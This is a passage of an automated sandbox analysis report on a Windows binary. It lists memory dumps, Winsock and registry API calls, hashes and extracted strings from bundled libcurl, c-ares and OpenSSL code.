                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: setsockopt
                              • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                              • API String ID: 3981526788-2373386790
                              • Opcode ID: 5145663a07b36cc9fcdcb0c9e9007469c71a6d85ba25f41ca70b0612841e870a
                              • Instruction ID: 62b17afd986cd3585c4a0ef150b1172f70febda82c017a17b179c07aedbeb367
                              • Opcode Fuzzy Hash: 5145663a07b36cc9fcdcb0c9e9007469c71a6d85ba25f41ca70b0612841e870a
                              • Instruction Fuzzy Hash: B7621371508341ABE720DF24CC46BABB7E5BF91304F44492AF98897292E771EA45CF93

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph (rendered graph; raw edge list omitted): nodes 857-1184 covering basic blocks 219740-21a070; API calls RegOpenKeyExA, RegQueryValueExA, RegCloseKey; numerous internal calls (including 2178a0, 4d8b70, 215ca0, 215d00, 2163f0, 20e960, 20ebf0 and others).
                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00219946
                              • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00219974
                              • RegCloseKey.KERNELBASE(?), ref: 0021998B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                              • API String ID: 3677997916-4129964100
                              • Opcode ID: 4a91aac5511a28494468458baee6a3f8083cc83e945e0aa1932c9857309d11b8
                              • Instruction ID: 9a2804904d0efb0184d8a8a907f9a9169cf24f2ceec440ca3b42bd8eca916ac2
                              • Opcode Fuzzy Hash: 4a91aac5511a28494468458baee6a3f8083cc83e945e0aa1932c9857309d11b8
                              • Instruction Fuzzy Hash: A532B7B1924302ABEB11AF20EC52A5B76E4AF64314F094834F90996253F731E9F5CB93

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph (rendered graph; raw edge list omitted): nodes 1360-1381 covering basic blocks 152f17-1531d6; API calls RegOpenKeyExA, RegEnumKeyExA, RegQueryValueExA, RegCloseKey; internal calls to 151619, 604b90, 606430, 606630, 606700, 606790, 606820.
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: EnumOpen
                              • String ID: Xlo$Xlo$lo
                              • API String ID: 3231578192-1835291670
                              • Opcode ID: 8287a34a065cb47ff29ab7b7a8488efc460ed2953ae2861963aa90c060b2c81e
                              • Instruction ID: ca7b5084c34d957e57630773edb74f36b60e5c2a815d3741e3096b373e9220d4
                              • Opcode Fuzzy Hash: 8287a34a065cb47ff29ab7b7a8488efc460ed2953ae2861963aa90c060b2c81e
                              • Instruction Fuzzy Hash: 267190B49043199FDB50DF69C98479EBBF1FF84308F10886DE9989B241D7749A888F92

                              Control-flow Graph (graph not reproduced; basic blocks 188b50-188f06 call connect, SleepEx)
                              APIs
                              • connect.WS2_32(?,?,00000001), ref: 00188C30
                              • SleepEx.KERNELBASE(00000000,00000000), ref: 00188CF3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: Sleepconnect
                              • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                              • API String ID: 238548546-879669977
                              • Opcode ID: 237361e33ef9d29b2f956ad34104101d081b7e4a798723baabc168205ae41e14
                              • Instruction ID: 70e04813a718c8b3a53fafdb052ad3fe6164681a55bbaa02b962020e634a378d
                              • Opcode Fuzzy Hash: 237361e33ef9d29b2f956ad34104101d081b7e4a798723baabc168205ae41e14
                              • Instruction Fuzzy Hash: C3B1C170604705AFDB10EF24CC85BA6B7E1AF95314F44862CF8594B2D2DB71EE54CB61

                              Control-flow Graph (graph not reproduced; basic blocks 189290-189470 call WSAIoctl, setsockopt)
                              APIs
                              • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0018935C
                              • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00189389
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: Ioctlsetsockopt
                              • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                              • API String ID: 1903391676-2691795271
                              • Opcode ID: 12bfe1654ab4818cb8215c23722fc6f75919eb1c32778aede684f1eea18c5efd
                              • Instruction ID: d6f9cb03e5a7c03be8b2f687cd9823f7a69d92d1ffba12c934bc3692233d2643
                              • Opcode Fuzzy Hash: 12bfe1654ab4818cb8215c23722fc6f75919eb1c32778aede684f1eea18c5efd
                              • Instruction Fuzzy Hash: BF51C371A04305ABDB14EF24CC81FBAB7A5FF85314F188529FD589B282E731EA51CB91

                              Control-flow Graph (graph not reproduced; basic blocks 1576a0-157762 call send)
                              APIs
                              • send.WS2_32(multi.c,?,?,?,00153D4E,00000000,?,?,001607BF), ref: 001576EB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: send
                              • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                              • API String ID: 2809346765-3388739168
                              • Opcode ID: 2b97b339586b54363679a80106ad22fb4cd774a8c55d7837f242af2c8475507b
                              • Instruction ID: 7225f28db9cce0f9f059ea8ead45b18becb0d8b965da4ee66b6702fb0e3c6351
                              • Opcode Fuzzy Hash: 2b97b339586b54363679a80106ad22fb4cd774a8c55d7837f242af2c8475507b
                              • Instruction Fuzzy Hash: D3113DB551C748BBE120AB19BC4BD377B5DDBC2B5AF450918BC245B381D361DC04C6B2

                              Control-flow Graph (graph not reproduced; basic blocks 1575e0-157699 call socket)
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: socket
                              • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                              • API String ID: 98920635-842387772
                              • Opcode ID: fd82009af401802ce0008634ae1c6f6dfec056abdf39dae4febc3712831fbd5e
                              • Instruction ID: 8d7903cb1e82721163e60a0eb87539136731a31b9179aba2fee008e4941b00ec
                              • Opcode Fuzzy Hash: fd82009af401802ce0008634ae1c6f6dfec056abdf39dae4febc3712831fbd5e
                              • Instruction Fuzzy Hash: AA118C76A04B156BE6216B38BC47F9B3B95DF82726F050914FC209A2D2D751C858C2E2

                              Control-flow Graph (graph not reproduced; basic blocks 18a150-18a250 call getsockname)
                              APIs
                              • getsockname.WS2_32(?,?,00000080), ref: 0018A1C7
                              Strings
                              • getsockname() failed with errno %d: %s, xrefs: 0018A1F0
                              • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0018A23B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: getsockname
                              • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                              • API String ID: 3358416759-2605427207
                              • Opcode ID: 9aecdf613302e1c168ea1ae9a87e824dbc4db7e9b53795776143c18ab783b5da
                              • Instruction ID: 8aac7cc8b7bc4ce17748a3e54990ed2a06cd1aeab417e344128698eb206bdd26
                              • Opcode Fuzzy Hash: 9aecdf613302e1c168ea1ae9a87e824dbc4db7e9b53795776143c18ab783b5da
                              • Instruction Fuzzy Hash: 4821EC71808680ABF7259719DC46FE773BCEF91334F040655F99853151FB325A858BE2

                              Control-flow Graph (graph not reproduced; basic blocks 16d5e0-16d68d call WSAStartup)
                              APIs
                              • WSAStartup.WS2_32(00000202), ref: 0016D65A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: Startup
                              • String ID: if_nametoindex$iphlpapi.dll
                              • API String ID: 724789610-3097795196
                              • Opcode ID: 3973c649c81478e12c37875e3afe1e655adc96fb574650d1b4bfa3438b383217
                              • Instruction ID: 7a2fdcae3a2d12fb662f6467eef2339aa3151f6a99f9460579e5ee54b06787f5
                              • Opcode Fuzzy Hash: 3973c649c81478e12c37875e3afe1e655adc96fb574650d1b4bfa3438b383217
                              • Instruction Fuzzy Hash: 5F014E90F4174506F751BB3CEC1B37735906F52304F452468D858962D2F729C998C253

                              Control-flow Graph (graph not reproduced; basic blocks 21aa30-21af1f call socket, ioctlsocket, connect)
                              APIs
                              • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0021AB9B
                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0021ABE4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: ioctlsocketsocket
                              • String ID:
                              • API String ID: 416004797-0
                              • Opcode ID: 609f55af8f0a492271279c3893b671a006c71032729bd3ed3d6ba9566622eb59
                              • Instruction ID: bd78ddf3eddb24d9f70c3fa09eaa6ef0425b3e6df8b1b1ca478e82a336f741aa
                              • Opcode Fuzzy Hash: 609f55af8f0a492271279c3893b671a006c71032729bd3ed3d6ba9566622eb59
                              • Instruction Fuzzy Hash: ACE124706253029FEB20CF24C885BAB77E1FF95314F044A2DF9988B291D775D9A4CB92
                              Similarity
                              • API ID: CloseEvent
                              • String ID: multi.c
                              • API String ID: 2624557715-214371023
                              • Opcode ID: ca3ca263a684f704ecb03ea71e162cfdd338fa83bc51100c9a9d2ecbd01d1978
                              • Instruction ID: 44c45c82276b0ee56400a87515bb18d4267108dbbd1772bc67647bef9c0a67ac
                              • Opcode Fuzzy Hash: ca3ca263a684f704ecb03ea71e162cfdd338fa83bc51100c9a9d2ecbd01d1978
                              • Instruction Fuzzy Hash: 4751D6B5900300EBDB11AA20AC46B6776A4AF61319F08443CFC6D9F293FB75E50E8792
                              Similarity
                              • API ID: closesocket
                              • String ID: FD %s:%d sclose(%d)
                              • API String ID: 2781271927-3116021458
                              • Opcode ID: 9e0c001143aa5fbb20c00328bdc0cc5f11aa9c13bda00ac6001de27c48a2be0c
                              • Instruction ID: 204857123de3f038b96826a3018e67c5a3b3951cc9542de51f6eab027308aace
                              • Opcode Fuzzy Hash: 9e0c001143aa5fbb20c00328bdc0cc5f11aa9c13bda00ac6001de27c48a2be0c
                              • Instruction Fuzzy Hash: 73D05E32909631AB8520655D7D4AC5B6BA8DEC6F61F060858FD54AB241D2609C0487E2
                              Similarity
                              • API ID: CloseHandle
                              • String ID: ]ko
                              • API String ID: 2962429428-3223431764
                              • Opcode ID: 48851dae666c9d23bd5da3a25d5120a31acea4f401a14b0423d5d01cf98776ef
                              • Instruction ID: 87a2d55da0237731ad4fba98e960eec5b616dbd13389be5897234c35e7ba275d
                              • Opcode Fuzzy Hash: 48851dae666c9d23bd5da3a25d5120a31acea4f401a14b0423d5d01cf98776ef
                              • Instruction Fuzzy Hash: 1D31B3B49047099BCB40EFB8D5856AEBBF1BF44304F00896DE8A8E7341E7349A54CF92
                              APIs
                              • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0021B29E,?,00000000,?,?), ref: 0021B0B9
                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00203C41,00000000), ref: 0021B0C1
                              Similarity
                              • API ID: ErrorLastconnect
                              • String ID:
                              • API String ID: 374722065-0
                              • Opcode ID: 0a51ce812b32b5e27790e1523ed0df0168050c7c90b24540f7ea97dff00dde1d
                              • Instruction ID: 88528125577dd02df4beb285cba11003c2f27e1a1087566d87326d57e0ad85a5
                              • Opcode Fuzzy Hash: 0a51ce812b32b5e27790e1523ed0df0168050c7c90b24540f7ea97dff00dde1d
                              • Instruction Fuzzy Hash: 3F01D8366142015BCA215E698C44FABB3E9FF9D364F140728F978931D1E726DDA08751
                              APIs
                              • gethostname.WS2_32(00000000,00000040), ref: 00204AA5
                              Similarity
                              • API ID: gethostname
                              • String ID:
                              • API String ID: 144339138-0
                              • Opcode ID: 2e7c6e074fdf4d9e81321f37e4bef7247bf18c7b877e30e6de3484189ae278f0
                              • Instruction ID: 95fbf41aee192c26a353b73cf5f3cd5a3b2ebac5ebfbdb26aac4d9365e97d169
                              • Opcode Fuzzy Hash: 2e7c6e074fdf4d9e81321f37e4bef7247bf18c7b877e30e6de3484189ae278f0
                              • Instruction Fuzzy Hash: 4C5108F0A247069BE730AF25DD4972376D4AF41319F14983DEB8A866D3E774E864CB02
                              APIs
                              • getsockname.WS2_32(?,?,00000080), ref: 0021AFD1
                              Similarity
                              • API ID: getsockname
                              • String ID:
                              • API String ID: 3358416759-0
                              • Opcode ID: 0d47e0e396d3419fbe116b8cc4eb575807816accc32d2b43bc848fa511bd384a
                              • Instruction ID: 33773cfb27b79aa5b65e6b5bbe744984d004358c912250f5e280727a8644da0b
                              • Opcode Fuzzy Hash: 0d47e0e396d3419fbe116b8cc4eb575807816accc32d2b43bc848fa511bd384a
                              • Instruction Fuzzy Hash: B211967081878595EB268F18D4027F6B3F4EFD4329F109618E59942550F7729AD68BC2
                              APIs
                              • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0021A97F
                              Similarity
                              • API ID: send
                              • String ID:
                              • API String ID: 2809346765-0
                              • Opcode ID: e7222d05a47f3a35fe3697a8aadad606e7d55e9751a9a518d6397e3a2eafb016
                              • Instruction ID: 723ff77b315ccb222ad226dad42880561e6ed6460b433f506e8eb07c3d70f335
                              • Opcode Fuzzy Hash: e7222d05a47f3a35fe3697a8aadad606e7d55e9751a9a518d6397e3a2eafb016
                              • Instruction Fuzzy Hash: F001A272B11711AFC6148F19DC85B9AB7A5EF84721F068659EA982B361C331AC508BE1
                              APIs
                              • socket.WS2_32(?,0021B280,00000000,-00000001,00000000,0021B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0021AF66
                              Similarity
                              • API ID: socket
                              • String ID:
                              • API String ID: 98920635-0
                              • Opcode ID: 8b22e25f1e278d7d6c39f4f819a06326e451c4fb2ac6e70fa327109a467a6e63
                              • Instruction ID: 01978e1cabd5c8a9a4882b72e1e37e3c7d42ae12d64bddb4a37ccadce993c8e1
                              • Opcode Fuzzy Hash: 8b22e25f1e278d7d6c39f4f819a06326e451c4fb2ac6e70fa327109a467a6e63
                              • Instruction Fuzzy Hash: 7EE0EDB6A152216BD6649E5CE8449ABF3ADEFC4B20F055A49BC5463204C730AC518BE2
                              APIs
                              • closesocket.WS2_32(?,00219422,?,?,?,?,?,?,?,?,?,?,?,w3 ,00611280,00000000), ref: 0021B04D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: closesocket
                              • String ID:
                              • API String ID: 2781271927-0
                              • Opcode ID: eb1271a527e3e5b7b19dbac9451e815711671fd5e3fdd9cbe48d473da04b8283
                              • Instruction ID: e23db5d876132ed46f464280b4c4502a1def633d251f528bcce632ac720c0477
                              • Opcode Fuzzy Hash: eb1271a527e3e5b7b19dbac9451e815711671fd5e3fdd9cbe48d473da04b8283
                              • Instruction Fuzzy Hash: 38D0C23430060257CA248E14C884A9772BB7FE5310FA8CB6CE02C8A150C73BCC93C601
                              APIs
                              • ioctlsocket.WS2_32(?,8004667E,?,?,0018AF56,?,00000001), ref: 001B67FC
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: ioctlsocket
                              • String ID:
                              • API String ID: 3577187118-0
                              • Opcode ID: 256560b4440a00c77dba0f2e520e3b97386bf24969f1d85212296144a787eb79
                              • Instruction ID: fd7d81672d212ed3b44b79f2b11354356f5c918ce99ed8121b6d4dadcf1e78ad
                              • Opcode Fuzzy Hash: 256560b4440a00c77dba0f2e520e3b97386bf24969f1d85212296144a787eb79
                              • Instruction Fuzzy Hash: 15C012F1118601AFC6088714D865A6F76E8DB85355F01581CB04681180EA709990CA16
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID:
                              • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                              • API String ID: 0-122532811
                              • Opcode ID: c432158843ee29e3d61829105afa2d7e47d5ad856a997a22a38995538618e30d
                              • Instruction ID: b8e38ad64318e1457e36a18685fcd2e8a28233f05a9eb86e6e9399de708cc1a4
                              • Opcode Fuzzy Hash: c432158843ee29e3d61829105afa2d7e47d5ad856a997a22a38995538618e30d
                              • Instruction Fuzzy Hash: A34217B1B08700AFD708DE28CC51B6BB6EAEFD4704F048A2DF95D97391D775A8148B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID:
                              • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                              • API String ID: 0-1914377741
                              • Opcode ID: 5604599220fca9276d9d81c875eda9c5c7ae44f2d46f1daaa3c8501def7aec0c
                              • Instruction ID: afa31139bbb2e6c8dd79e27c15ea70ce4a9ba2647bd64bb9f067b3c84f62c490
                              • Opcode Fuzzy Hash: 5604599220fca9276d9d81c875eda9c5c7ae44f2d46f1daaa3c8501def7aec0c
                              • Instruction Fuzzy Hash: C1721830608B459BE7354A28C5467A6B7F3AF91344F05C62CED8D5B293EBF6E884C781
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID:
                              • String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
                              • API String ID: 0-2550110336
                              • Opcode ID: 37b2f518befada2ba0efe38084488a2a89ea57ff2a9351156f4dc5535107ba13
                              • Instruction ID: b3f7619b8453281c2149ba04645940f9814f23a4f76bdeb8a94b21f57c065788
                              • Opcode Fuzzy Hash: 37b2f518befada2ba0efe38084488a2a89ea57ff2a9351156f4dc5535107ba13
                              • Instruction Fuzzy Hash: 3D326C74B48304BBD72F6A209C42FFA7795AF48704F144818FE496A2C2E7B5E8D5C653
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID:
                              • String ID: $.$;$?$?$xn--$xn--
                              • API String ID: 0-543057197
                              • Opcode ID: b41e76f980aa5bd07c14582448f6bd81914473a69c380e151c797156c4300c55
                              • Instruction ID: cafec66c5b34dffc9770d9c9477c2fd92d0edbbca8af40c57516b8d4e947cc34
                              • Opcode Fuzzy Hash: b41e76f980aa5bd07c14582448f6bd81914473a69c380e151c797156c4300c55
                              • Instruction Fuzzy Hash: B7225A71924342AFEB609E24DD81BAB76D5AFA4308F04053CF86993293E774DDA4CB52
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID:
                              • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                              • API String ID: 0-2555271450
                              • Opcode ID: 5e23946d2ff47246ae2b1bcfe617307a91c4ab95ad38e7815da61a0b50caf8cc
                              • Instruction ID: 735ffefc41e13e80328c464c1179b8b1081a4287e18e0c8db2d517296b2edaf0
                              • Opcode Fuzzy Hash: 5e23946d2ff47246ae2b1bcfe617307a91c4ab95ad38e7815da61a0b50caf8cc
                              • Instruction Fuzzy Hash: 40C26A71608741CFC718CF28C4D066AB7E2BFC9315F158A2DE8AA9B355D770ED498B82
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID:
                              • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                              • API String ID: 0-2555271450
                              • Opcode ID: 1604680e8827ef2ca7a71faae5cfc26f1fd8681a7a28245ff85e9c5da8feb912
                              • Instruction ID: 287992e04e53cb33a942d5fa930ef969d2fb77f785f6383929773b49cb401a31
